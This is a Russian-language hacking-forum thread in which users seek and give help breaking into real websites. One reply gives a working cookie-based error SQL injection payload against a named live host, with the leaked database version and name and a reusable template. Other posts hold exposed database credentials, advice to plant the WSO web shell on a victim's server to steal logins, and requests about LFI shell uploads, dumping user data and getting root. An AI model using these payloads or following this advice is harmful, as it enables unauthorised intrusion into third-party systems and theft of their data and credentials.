Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    panfilov1991, ссылка у тя http://твой_сайт.***/server
    а скуль в куках. Лог то смотри
     
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)
     
  3. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).
    Нашел следующий скрипт sql.php:
    Code:
    <?php
    $sql_usr 	= "megaadmin";
    $sql_passwd 	= "blueavatar";
    $sql_ip 	= "127.0.0.1";
    $sql_name 	= "all";
    $sql_charset 	= "utf8";
    $memcache_host 	= "localhost";
    $memcache_port 	= 65000;
    ?>
    
    Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?
    Спасибо
     
  4. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    zloy_fantom, только если есть шел на уязвимой машине
     
  5. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Кто может подсказать по xss. Напишите пожалуйста в личку.
     
  6. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    panfilov1991
    В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
    zloy_fantom
    Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!
     
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта



    экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.
     
  9. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Пожалуйста
     
    #21889 panfilov1991, 2 Mar 2013
    Last edited: 9 Mar 2013
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.

    Все отлично работает, запрос переделал, мне так удобнее...
    Code:
    Host: game.parlahost.ru
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Cache-Control: max-age=0
    Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"
    
    Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'

    Версия - 5.5.29-1-log
    Названия Базы Данных - s10parl

    "or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"
    Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА

    З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!
     
    #21890 cat1vo, 2 Mar 2013
    Last edited: 2 Mar 2013
    3 people like this.
  11. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    А если такой вариант:
    На той-же машине, что и сервер, развернут сервер openvpn, ко внутренней сети которого я подключился как клиент. На паре машин этой сети открыты порты snmp, mysql и ssh. snmp видна просто как расшаренные папки, но в них ничего интересного. По ssh подключение доступно через putty, знать-бы пароль root... А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?
    Спасибо
    Зарегистрировался, а вот как посмотреть, какие данные для доступа к БД они предоставляют, не понял. Зайти под теми данными попробую (дождусь только, когда админ разлогинится), только что мне это даст? Я ведь все равно не смогу шелл загрузить...Или смогу? Короче, надо пробовать, может будет доступна панель управления или редактирования....
    Спасибо
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...
     
    _________________________
  13. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Не получается: wso положил в расшаренную папку внутренней сети, но каков путь к ней в подсистеме сервера, я не знаю, т.е., через интерпретатор PHP wso не достать :(
     
  14. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Срочно! Нужна помощь с заливкой шелла!

    Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((

    Кто может почь, пишите сюда или в ЛС.

    Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Ну когда же вы научитесь самостоятельно искать инфу?! ладно...
    заходим в раздел
    Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
    Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд и внимательно изучаете в ней нужные вам аспекты!
    а точнее ткну пальцем!
    статьи по PHP инклудам:
    php injection
    Автор GreenBear
    TRUE PHP-injection
    Автор Zadoxlik
    PHP-include и способы защиты
    Автор _Pantera_
    [новый способ] замена нулл-байту в инклудах
    Автор [Raz0r]
    Логи и конфиги:
    Default *log, *conf files locations
    respect ettee
     
    _________________________
  16. FuckGoogle

    FuckGoogle New Member

    Joined:
    18 Jan 2013
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    phpinfo

    здрасте
    уменя естъ phpinfo() от крупного сайта...
    только спомощю phpinfo() я смогу етот сайт ломатъ?
    и как?
    можте кто нибудъ нопомч мне?
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Нет не сможите!, phpinfo() выводи инфу о настройках апача и мелкой тароблы не болие того!
     
    _________________________
  18. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Возможно сформировать запрос так чтоб скрипт выдал
    Code:
    query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
    ?
    PHP:
    require_once('../../../wp-config.php');
    require_once(
    '../../../wp-includes/functions.php');
     
    // CSRF attack protection. Check the Referal field to be the same
    // domain of the script
     
    $k_id strip_tags($wpdb->escape($_GET['id']));
    $k_action strip_tags($wpdb->escape($_GET['action']));
    $k_path strip_tags($wpdb->escape($_GET['path']));
    $k_imgIndex strip_tags($wpdb->escape($_GET['imgIndex']));
     
    // prevent SQL injection
    if (!is_numeric($k_id)) die('error|Query error');
     
    $table_name $wpdb->prefix 'comment_rating';
    $comment_table_name $wpdb->prefix 'comments';
     
    if(
    $k_id && $k_action && $k_path) {
        
    //Check to see if the comment id exists and grab the rating
        
    $query "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
        
    $result mysql_query($query);
     
            if(!
    $result) { die('error|mysql: '.mysql_error()); }
           
       if(
    mysql_num_rows($result))
            {
          
    $duplicated 0;  // used as a counter to off set duplicated votes
          
    if($row = @mysql_fetch_assoc($result))
          {
             
    // Handle proxy with original IP address
             
    $ip getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
             if(
    strstr($row['ck_ips'], $ip)) {
                
    // die('error|You have already voted on this item!');
                // Just don't count duplicated votes
                
    $duplicated 1;
                
    $ck_ips $row['ck_ips'];
             }
             else {
                
    $ck_ips $row['ck_ips'] . ',' $ip// IPs are separated by ','
             
    }
          }
                   
          
    $total $row['ck_rating_up'] - $row['ck_rating_down'];
          if(
    $k_action == 'add') {
             
    $rating $row['ck_rating_up'] + $duplicated;
             
    $direction 'up';
             
    $total $total $duplicated;
          }
          elseif(
    $k_action == 'subtract')
          {
             
    $rating $row['ck_rating_down'] + $duplicated;
             
    $direction 'down';
             
    $total $total $duplicated;
          } else {
                die(
    'error|Try again later'); //No action given.
          
    }
                   
          if (!
    $duplicated)
          {
             
    $query "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" $ck_ips  "' WHERE ck_comment_id = $k_id";
             
    $result mysql_query($query);
             if(!
    $result)
             {
                
    // die('error|query '.$query);
                
    die('error|Query error');
             }
             
             
    // Now duplicated votes will not
             
    if(!mysql_affected_rows())
             {
                die(
    'error|affected '$rating);
             }
             
             
    $karma_modified 0;
             if (
    get_option('ckrating_karma_type') == 'likes' && $k_action == 'add') {
                
    $karma_modified 1$karma $rating;
             }
             if (
    get_option('ckrating_karma_type') == 'dislikes' && $k_action == 'subtract') {
                
    $karma_modified 1$karma $rating;
             }
             if (
    get_option('ckrating_karma_type') == 'both') {
                
    $karma_modified 1$karma $total;
             }
     
             if (
    $karma_modified) {
                
    $query "UPDATE `$comment_table_name` SET comment_karma = '$karma' WHERE comment_ID = $k_id";
                
    $result mysql_query($query);
                if(!
    $result) die('error|Comment Query error');
             }
     
             
    // Invalidate the W3 cache by triggering the global wordpress action hook for an edited comment
             
    do_action("edit_comment"$k_id);
          }
       } else {
            die(
    'error|Comment doesnt exist'); //Comment id not found in db, something wrong ?
       
    }
    } else {
        die(
    'error|Fatal: html format error');
    }
     
    // Add the + sign,
    if ($total 0) { $total "+$total"; }
     
    //This sends the data back to the js to process and show on the page
    // The dummy field will separate out any potential garbage that
    // WP-superCache may attached to the end of the return.
    echo("done|$k_id|$rating|$k_path|$direction|$total|$k_imgIndex|dummy");
    ?>
     
  19. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    И снова всем привет!
    Вот у меня возникла такая проблемка, есть сайт с форумом IPB 2.3.5 на сайте есть sql-injection, довольно быстро получил доступ к БД и сразу же начал дампить данные юзеров форума. И тут получился весь облом. Вся соль в том что есть колонка name, email и т.п. а вот password - нету. Вопрос: где админ мог скрыть пароли юзеров и как?
     
  20. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Кто может подробнее обьяснить как компилить запускать exploit?Где качать pyton и т.д.Буду очень благодарен.Есть большое количество шелов.Хотелось бы попробовать получить root.
     
Thread Status:
Not open for further replies.